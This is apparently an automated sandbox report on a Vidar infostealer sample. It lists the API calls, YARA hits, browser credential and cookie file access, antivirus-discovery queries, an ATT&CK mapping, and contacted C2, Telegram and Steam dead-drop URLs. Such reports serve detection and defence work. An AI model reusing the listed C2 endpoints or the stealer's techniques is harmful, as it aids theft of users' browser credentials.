                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C807A1
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00C7FF0C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00411D31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_1FA22112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_1FA22112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FBFFF17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_1FA23AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_1FC13300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12DF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69834 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C69834
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411BEC GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00411BEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411CBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00411CBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.56bDgH9sMQ.exe.c60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.56bDgH9sMQ.exe.c60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAA1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FAA1FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA9DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,2_2_1FA9DFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA35C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1FA35C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA9DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1FA9DB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB4D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1FB4D9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAC5910 sqlite3_mprintf,sqlite3_bind_int64,2_2_1FAC5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAFD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FAFD610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAC55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FAC55B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB4D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1FB4D4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB414D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1FB414D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FADD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FADD3B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAC51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FAC51D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAB9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,2_2_1FAB9090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA50FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1FA50FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB04D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1FB04D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA34820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,2_2_1FA34820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA48680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,2_2_1FA48680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA706E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_1FA706E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA78550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,2_2_1FA78550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA98200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_1FA98200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB037E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FB037E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAE3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FAE3770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA4B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,2_2_1FA4B400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA7EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_1FA7EF30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA9A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,2_2_1FA9A6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA366C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1FA366C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA8E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_1FA8E200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA9E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1FA9E170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA8E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1FA8E090

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		511
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Virtualization/Sandbox Evasion                		LSASS Memory51
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)511
                Process Injection                		Security Account Manager1
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		2
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS12
                Process Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeylogging13
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem44
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                56bDgH9sMQ.exe79%ReversingLabsWin32.Trojan.RedLine
                56bDgH9sMQ.exe100%AviraHEUR/AGEN.1317026
                56bDgH9sMQ.exe100%Joe Sandbox ML
                56bDgH9sMQ.exe81%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                t.me0%VirustotalBrowse
                windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://195.201.251.214:9000/mozglue.dll0%Avira URL Cloudsafe
                https://t.me/0%Avira URL Cloudsafe
                https://195.201.251.214:9000/nss3.dll0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                https://195.201.251.214:9000/mozglue.dll0%VirustotalBrowse
                https://195.201.251.214:9000/nss3.dll0%VirustotalBrowse
                https://195.201.251.214:9000/y0%Avira URL Cloudsafe
                https://web.telegram.org0%Avira URL Cloudsafe
                https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll0%Avira URL Cloudsafe
                https://195.201.251.214:9000/0%Avira URL Cloudsafe
                https://t.me/0%VirustotalBrowse
                https://195.201.251.214:9000/l0%Avira URL Cloudsafe
                https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll0%VirustotalBrowse
                https://web.telegram.org0%VirustotalBrowse
                https://195.201.251.214:9000/vcruntime140.dllt0%Avira URL Cloudsafe
                https://195.201.251.214:9000/mozglue.dllge0%Avira URL Cloudsafe
                https://195.201.251.214:9000/9zn0%Avira URL Cloudsafe
                https://195.201.251.214:9000/nss3.dllA0%Avira URL Cloudsafe
                https://195.201.251.214:9000/6%VirustotalBrowse
                https://195.201.251.214:9000/l0%VirustotalBrowse
                https://195.201.251.214:9000/vcruntime140.dlls0%Avira URL Cloudsafe
                https://195.201.251.214:9000/Mac0%Avira URL Cloudsafe
                https://195.201.251.214:9000/icrosoft0%Avira URL Cloudsafe
                https://195.201.251.214:9000Google0%Avira URL Cloudsafe
                https://195.201.251.214:9000/y0%VirustotalBrowse
                https://195.201.251.214:9000/0cosoft0%Avira URL Cloudsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%Avira URL Cloudsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%Avira URL Cloudsafe
                https://195.201.251.214:9000/freebl3.dllffsets0%Avira URL Cloudsafe
                https://195.201.251.214:9000/mozglue.dlla0%Avira URL Cloudsafe
                https://t.me/g067nJt0%Avira URL Cloudsafe
                https://195.201.251.214:9000/freebl3.dll0%Avira URL Cloudsafe
                https://195.201.251.214:9000/softokn3.dll0%Avira URL Cloudsafe
                https://195.201.251.214:9000/nss3.dllU0%Avira URL Cloudsafe
                https://t.me/g067nry1neMozilla/5.00%Avira URL Cloudsafe
                https://195.201.251.214:9000/freebl3.dll0%VirustotalBrowse
                http://www.sqlite.org/copyright.html.0%Avira URL Cloudsafe
                https://195.201.251.214:9000/softokn3.dll0%VirustotalBrowse
                https://195.201.251.214:9000/mozglue.dllo0%Avira URL Cloudsafe
                https://195.201.251.214:9000/freebl3.dllatch0%Avira URL Cloudsafe
                https://195.201.251.214:9000/msvcp140.dllet0%Avira URL Cloudsafe
                https://195.201.251.214:9000g0%Avira URL Cloudsafe
                https://t.me/g067nry1neMozilla/5.00%VirustotalBrowse
                https://195.201.251.214:9000/nss3.dllo0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://195.201.251.214:9000/msvcp140.dll0%Avira URL Cloudsafe
                http://www.sqlite.org/copyright.html.0%VirustotalBrowse
                https://195.201.251.214:9000/:90000%Avira URL Cloudsafe
                https://195.201.251.214:900030cle0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://195.201.251.214:9000/freebl3.dllm0%Avira URL Cloudsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                https://195.201.251.214:9000/freebl3.dllu0%Avira URL Cloudsafe
                https://195.201.251.214:9000/nzC0%Avira URL Cloudsafe
                https://195.201.251.214:9000/vcruntime140.dller0%Avira URL Cloudsafe
                https://195.201.251.214:9000/softokn3.dllll0%Avira URL Cloudsafe
                https://195.201.251.214:9000/vcruntime140.dll0%Avira URL Cloudsafe
                https://195.201.251.214:9000/msvcp140.dlle0%Avira URL Cloudsafe
                https://195.201.251.214:9000/softokn3.dlle0%Avira URL Cloudsafe
                https://195.201.251.214:9000/vcruntime140.dllD0%Avira URL Cloudsafe
                https://steamcommunity.com/profiles/76561199707802586100%Avira URL Cloudmalware
                https://195.201.251.214:9000/nes0%Avira URL Cloudsafe
                https://t.me/g067n100%Avira URL Cloudmalware
                https://195.201.251.214:9000/freebl3.dllge0%Avira URL Cloudsafe
                https://195.201.251.214:9000/O0%Avira URL Cloudsafe
                https://t.me/pjm0%Avira URL Cloudsafe
                https://195.201.251.214:9000/softokn3.dllV0%Avira URL Cloudsafe
                https://195.201.251.214/0%Avira URL Cloudsafe
                https://195.201.251.214:90000%Avira URL Cloudsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe
                https://195.201.251.214:9000/sqlt.dll0%Avira URL Cloudsafe
                https://195.201.251.214:9000Microsoft0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                t.me
                		149.154.167.99
                		truetrueunknown
                windowsupdatebg.s.llnwi.net
                		87.248.205.0
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://steamcommunity.com/profiles/76561199707802586true
                • Avira URL Cloud: malware
                		unknown
                https://t.me/g067ntrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabBGDAAK.2.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmptrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=BGDAAK.2.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/mozglue.dllRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nss3.dllRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/yRegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://web.telegram.orgRegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • 6%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/lRegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/vcruntime140.dlltRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/mozglue.dllgeRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/9znRegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/nss3.dllARegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BGDAAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/vcruntime140.dllsRegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/MacRegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drfalse
                • URL Reputation: safe
                		unknown
                https://195.201.251.214:9000/icrosoftRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000GoogleRegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://195.201.251.214:9000/0cosoftRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBAKFCB.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBGDAAK.2.drfalse
                • URL Reputation: safe
                		unknown
